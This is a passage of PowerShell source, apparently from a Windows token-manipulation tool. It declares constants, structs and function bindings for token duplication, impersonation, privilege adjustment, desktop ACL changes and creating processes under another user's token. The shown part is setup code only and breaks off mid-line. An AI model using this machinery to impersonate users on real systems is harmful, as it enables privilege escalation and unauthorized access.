DACL_SECURITY_INFORMATION = 0x4\n        ACCESS_ALLOWED_ACE_TYPE = 0x0\n        STANDARD_RIGHTS_REQUIRED = 0x000F0000\n        DESKTOP_GENERIC_ALL = 0x000F01FF\n        WRITE_DAC = 0x00040000\n        OBJECT_INHERIT_ACE = 0x1\n        GRANT_ACCESS = 0x1\n        TRUSTEE_IS_NAME = 0x1\n        TRUSTEE_IS_SID = 0x0\n        TRUSTEE_IS_USER = 0x1\n        TRUSTEE_IS_WELL_KNOWN_GROUP = 0x5\n        TRUSTEE_IS_GROUP = 0x2\n        PROCESS_QUERY_INFORMATION = 0x400\n        TOKEN_ASSIGN_PRIMARY = 0x1\n        TOKEN_DUPLICATE = 0x2\n        TOKEN_IMPERSONATE = 0x4\n        TOKEN_QUERY_SOURCE = 0x10\n        STANDARD_RIGHTS_READ = 0x20000\n        TokenStatistics = 10\n        TOKEN_ALL_ACCESS = 0xf01ff\n        MAXIMUM_ALLOWED = 0x02000000\n        THREAD_ALL_ACCESS = 0x1f03ff\n        ERROR_INVALID_PARAMETER = 0x57\n        LOGON_NETCREDENTIALS_ONLY = 0x2\n        SE_PRIVILEGE_ENABLED = 0x2\n        SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1\n        SE_PRIVILEGE_REMOVED = 0x4\n    }\n\n    $Win32Constants = New-Object PSObject -Property $Constants\n    ###############################\n\n\n    ###############################\n    #Win32Structures\n    ###############################\n\t#Define all the structures/enums that will be used\n\t#\tThis article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html\n\t$Domain = [AppDomain]::CurrentDomain\n\t$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')\n\t$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)\n\t$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n\n    #ENUMs\n\t$TypeBuilder = $ModuleBuilder.DefineEnum('TOKEN_INFORMATION_CLASS', 'Public', [UInt32])\n\t$TypeBuilder.DefineLiteral('TokenUser', [UInt32] 1) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenGroups', [UInt32] 2) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenPrivileges', [UInt32] 3) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenOwner', [UInt32] 4) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenPrimaryGroup', [UInt32] 5) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDefaultDacl', [UInt32] 6) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSource', [UInt32] 7) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenType', [UInt32] 8) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenImpersonationLevel', [UInt32] 9) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenStatistics', [UInt32] 10) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedSids', [UInt32] 11) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSessionId', [UInt32] 12) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenGroupsAndPrivileges', [UInt32] 13) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSessionReference', [UInt32] 14) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSandBoxInert', [UInt32] 15) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAuditPolicy', [UInt32] 16) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenOrigin', [UInt32] 17) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenElevationType', [UInt32] 18) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenLinkedToken', [UInt32] 19) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenElevation', [UInt32] 20) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenHasRestrictions', [UInt32] 21) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAccessInformation', [UInt32] 22) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenVirtualizationAllowed', [UInt32] 23) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenVirtualizationEnabled', [UInt32] 24) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIntegrityLevel', [UInt32] 25) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenUIAccess', [UInt32] 26) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenMandatoryPolicy', [UInt32] 27) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenLogonSid', [UInt32] 28) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIsAppContainer', [UInt32] 29) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenCapabilities', [UInt32] 30) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAppContainerSid', [UInt32] 31) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenAppContainerNumber', [UInt32] 32) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenUserClaimAttributes', [UInt32] 33) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDeviceClaimAttributes', [UInt32] 34) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedUserClaimAttributes', [UInt32] 35) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedDeviceClaimAttributes', [UInt32] 36) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenDeviceGroups', [UInt32] 37) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenRestrictedDeviceGroups', [UInt32] 38) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenSecurityAttributes', [UInt32] 39) | Out-Null\n    $TypeBuilder.DefineLiteral('TokenIsRestricted', [UInt32] 40) | Out-Null\n    $TypeBuilder.DefineLiteral('MaxTokenInfoClass', [UInt32] 41) | Out-Null\n\t$TOKEN_INFORMATION_CLASS = $TypeBuilder.CreateType()\n\n    #STRUCTs\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LARGE_INTEGER', $Attributes, [System.ValueType], 8)\n\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t$LARGE_INTEGER = $TypeBuilder.CreateType()\n\n    #Struct LUID\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t$TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('HighPart', [Int32], 'Public') | Out-Null\n\t$LUID = $TypeBuilder.CreateType()\n\n    #Struct TOKEN_STATISTICS\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_STATISTICS', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('TokenId', $LUID, 'Public') | Out-Null\n\t$TypeBuilder.DefineField('AuthenticationId', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('ExpirationTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('TokenType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ImpersonationLevel', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('DynamicCharged', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('DynamicAvailable', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('GroupCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ModifiedId', $LUID, 'Public') | Out-Null\n\t$TOKEN_STATISTICS = $TypeBuilder.CreateType()\n\n    #Struct LSA_UNICODE_STRING\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LSA_UNICODE_STRING', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('Length', [UInt16], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('MaximumLength', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Buffer', [IntPtr], 'Public') | Out-Null\n\t$LSA_UNICODE_STRING = $TypeBuilder.CreateType()\n\n    #Struct LSA_LAST_INTER_LOGON_INFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('LSA_LAST_INTER_LOGON_INFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('LastSuccessfulLogon', $LARGE_INTEGER, 'Public') | Out-Null\n\t$TypeBuilder.DefineField('LastFailedLogon', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('FailedAttemptCountSinceLastSuccessfulLogon', [UInt32], 'Public') | Out-Null\n\t$LSA_LAST_INTER_LOGON_INFO = $TypeBuilder.CreateType()\n\n    #Struct SECURITY_LOGON_SESSION_DATA\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('SECURITY_LOGON_SESSION_DATA', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('Size', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('LoginID', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Username', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginDomain', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('AuthenticationPackage', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogonType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Session', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sid', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LoginServer', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('DnsDomainName', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Upn', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('UserFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('LastLogonInfo', $LSA_LAST_INTER_LOGON_INFO, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogonScript', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('ProfilePath', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('HomeDirectory', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('HomeDirectoryDrive', $LSA_UNICODE_STRING, 'Public') | Out-Null\n    $TypeBuilder.DefineField('LogoffTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('KickOffTime', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordLastSet', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordCanChange', $LARGE_INTEGER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('PasswordMustChange', $LARGE_INTEGER, 'Public') | Out-Null\n\t$SECURITY_LOGON_SESSION_DATA = $TypeBuilder.CreateType()\n\n    #Struct STARTUPINFO\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('STARTUPINFO', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('cb', [UInt32], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('lpReserved', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpDesktop', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpTitle', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwX', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwY', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYSize', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwXCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwYCountChars', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFillAttribute', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwFlags', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('wShowWindow', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('cbReserved2', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('lpReserved2', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdInput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdOutput', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('hStdError', [IntPtr], 'Public') | Out-Null\n\t$STARTUPINFO = $TypeBuilder.CreateType()\n\n    #Struct PROCESS_INFORMATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('PROCESS_INFORMATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('hProcess', [IntPtr], 'Public') | Out-Null\n\t$TypeBuilder.DefineField('hThread', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwProcessId', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('dwThreadId', [UInt32], 'Public') | Out-Null\n\t$PROCESS_INFORMATION = $TypeBuilder.CreateType()\n\n    #Struct TOKEN_ELEVATION\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t$TypeBuilder = $ModuleBuilder.DefineType('TOKEN_ELEVATION', $Attributes, [System.ValueType])\n\t$TypeBuilder.DefineField('TokenIsElevated', [UInt32], 'Public') | Out-Null\n\t$TOKEN_ELEVATION = $TypeBuilder.CreateType()\n\n    #Struct LUID_AND_ATTRIBUTES\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n    $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n    $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t\n    #Struct TOKEN_PRIVILEGES\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n    $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\n    #Struct ACE_HEADER\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACE_HEADER', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('AceType', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceFlags', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceSize', [UInt16], 'Public') | Out-Null\n    $ACE_HEADER = $TypeBuilder.CreateType()\n\n    #Struct ACL\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACL', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('AclRevision', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sbz1', [Byte], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AclSize', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('AceCount', [UInt16], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Sbz2', [UInt16], 'Public') | Out-Null\n    $ACL = $TypeBuilder.CreateType()\n\n    #Struct ACE_HEADER\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('ACCESS_ALLOWED_ACE', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('Header', $ACE_HEADER, 'Public') | Out-Null\n    $TypeBuilder.DefineField('Mask', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('SidStart', [UInt32], 'Public') | Out-Null\n    $ACCESS_ALLOWED_ACE = $TypeBuilder.CreateType()\n\n    #Struct TRUSTEE\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('TRUSTEE', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('pMultipleTrustee', [IntPtr], 'Public') | Out-Null\n    $TypeBuilder.DefineField('MultipleTrusteeOperation', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('TrusteeForm', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('TrusteeType', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('ptstrName', [IntPtr], 'Public') | Out-Null\n    $TRUSTEE = $TypeBuilder.CreateType()\n\n    #Struct EXPLICIT_ACCESS\n    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n    $TypeBuilder = $ModuleBuilder.DefineType('EXPLICIT_ACCESS', $Attributes, [System.ValueType])\n    $TypeBuilder.DefineField('grfAccessPermissions', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('grfAccessMode', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('grfInheritance', [UInt32], 'Public') | Out-Null\n    $TypeBuilder.DefineField('Trustee', $TRUSTEE, 'Public') | Out-Null\n    $EXPLICIT_ACCESS = $TypeBuilder.CreateType()\n    ###############################\n\n\n    ###############################\n    #Win32Functions\n    ###############################\n    $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\n\t$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\n\n    $OpenProcessTokenAddr = Get-ProcAddress advapi32.dll OpenProcessToken\n\t$OpenProcessTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenProcessToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessTokenAddr, $OpenProcessTokenDelegate)    \n\n    $GetTokenInformationAddr = Get-ProcAddress advapi32.dll GetTokenInformation\n\t$GetTokenInformationDelegate = Get-DelegateType @([IntPtr], $TOKEN_INFORMATION_CLASS, [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])\n\t$GetTokenInformation = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetTokenInformationAddr, $GetTokenInformationDelegate)    \n\n    $SetThreadTokenAddr = Get-ProcAddress advapi32.dll SetThreadToken\n\t$SetThreadTokenDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Bool])\n\t$SetThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetThreadTokenAddr, $SetThreadTokenDelegate)    \n\n    $ImpersonateLoggedOnUserAddr = Get-ProcAddress advapi32.dll ImpersonateLoggedOnUser\n\t$ImpersonateLoggedOnUserDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$ImpersonateLoggedOnUser = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateLoggedOnUserAddr, $ImpersonateLoggedOnUserDelegate)\n\n    $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf\n\t$RevertToSelfDelegate = Get-DelegateType @() ([Bool])\n\t$RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate)\n\n    $LsaGetLogonSessionDataAddr = Get-ProcAddress secur32.dll LsaGetLogonSessionData\n\t$LsaGetLogonSessionDataDelegate = Get-DelegateType @([IntPtr], [IntPtr].MakeByRefType()) ([UInt32])\n\t$LsaGetLogonSessionData = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaGetLogonSessionDataAddr, $LsaGetLogonSessionDataDelegate)\n\n    $CreateProcessWithTokenWAddr = Get-ProcAddress advapi32.dll CreateProcessWithTokenW\n\t$CreateProcessWithTokenWDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessWithTokenW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessWithTokenWAddr, $CreateProcessWithTokenWDelegate)\n\n    $memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t$memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t$memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\n    $DuplicateTokenExAddr = Get-ProcAddress advapi32.dll DuplicateTokenEx\n\t$DuplicateTokenExDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType()) ([Bool])\n\t$DuplicateTokenEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DuplicateTokenExAddr, $DuplicateTokenExDelegate)\n\n    $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW\n\t$LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool])\n\t$LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate)\n\n    $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle\n\t$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])\n\t$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)\n\n    $LsaFreeReturnBufferAddr = Get-ProcAddress secur32.dll LsaFreeReturnBuffer\n\t$LsaFreeReturnBufferDelegate = Get-DelegateType @([IntPtr]) ([UInt32])\n\t$LsaFreeReturnBuffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LsaFreeReturnBufferAddr, $LsaFreeReturnBufferDelegate)\n\n    $OpenThreadAddr = Get-ProcAddress kernel32.dll OpenThread\n\t$OpenThreadDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\n\t$OpenThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadAddr, $OpenThreadDelegate)\n\n    $OpenThreadTokenAddr = Get-ProcAddress advapi32.dll OpenThreadToken\n\t$OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])\n\t$OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)\n\n    $CreateProcessAsUserWAddr = Get-ProcAddress advapi32.dll CreateProcessAsUserW\n\t$CreateProcessAsUserWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([Bool])\n\t$CreateProcessAsUserW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateProcessAsUserWAddr, $CreateProcessAsUserWDelegate)\n\n    $OpenWindowStationWAddr = Get-ProcAddress user32.dll OpenWindowStationW\n    $OpenWindowStationWDelegate = Get-DelegateType @([IntPtr], [Bool], [UInt32]) ([IntPtr])\n    $OpenWindowStationW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenWindowStationWAddr, $OpenWindowStationWDelegate)\n\n    $OpenDesktopAAddr = Get-ProcAddress user32.dll OpenDesktopA\n    $OpenDesktopADelegate = Get-DelegateType @([String], [UInt32], [Bool], [UInt32]) ([IntPtr])\n    $OpenDesktopA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenDesktopAAddr, $OpenDesktopADelegate)\n\n    $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf\n    $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])\n    $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\n    $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA\n    $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], $LUID.MakeByRefType()) ([Bool])\n    $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)\n\n    $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges\n    $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], $TOKEN_PRIVILEGES.MakeByRefType(), [UInt32], [IntPtr], [IntPtr]) ([Bool])\n    $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)\n\n    $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread\n    $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])\n    $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)\n\n    $GetSecurityInfoAddr = Get-ProcAddress advapi32.dll GetSecurityInfo\n    $GetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType()) ([UInt32])\n    $GetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetSecurityInfoAddr, $GetSecurityInfoDelegate)\n\n    $SetSecurityInfoAddr = Get-ProcAddress advapi32.dll SetSecurityInfo\n    $SetSecurityInfoDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([UInt32])\n    $SetSecurityInfo = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetSecurityInfoAddr, $SetSecurityInfoDelegate)\n\n    $GetAceAddr = Get-ProcAddress advapi32.dll GetAce\n    $GetAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr].MakeByRefType()) ([IntPtr])\n    $GetAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAceAddr, $GetAceDelegate)\n\n    $LookupAccountSidWAddr = Get-ProcAddress advapi32.dll LookupAccountSidW\n    $LookupAccountSidWDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UInt32].MakeByRefType(), [IntPtr], [UInt32].MakeByRefType(), [UInt32].MakeByRefType()) ([Bool])\n    $LookupAccountSidW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupAccountSidWAddr, $LookupAccountSidWDelegate)\n\n    $AddAccessAllowedAceAddr = Get-ProcAddress advapi32.dll AddAccessAllowedAce\n    $AddAccessAllowedAceDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [IntPtr]) ([Bool])\n    $AddAccessAllowedAce = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AddAccessAllowedAceAddr, $AddAccessAllowedAceDelegate)\n\n    $CreateWellKnownSidAddr = Get-ProcAddress advapi32.dll CreateWellKnownSid\n    $CreateWellKnownSidDelegate = Get-DelegateType @([UInt32], [IntPtr], [IntPtr], [UInt32].MakeByRefType()) ([Bool])\n    $CreateWellKnownSid = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateWellKnownSidAddr, $CreateWellKnownSidDelegate)\n\n    $SetEntriesInAclWAddr = Get-ProcAddress advapi32.dll SetEntriesInAclW\n    $SetEntriesInAclWDelegate = Get-DelegateType @([UInt32], $EXPLICIT_ACCESS.MakeByRefType(), [IntPtr], [IntPtr].MakeByRefType()) ([UInt32])\n    $SetEntriesInAclW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetEntriesInAclWAddr, $SetEntriesInAclWDelegate)\n\n    $LocalFreeAddr = Get-ProcAddress 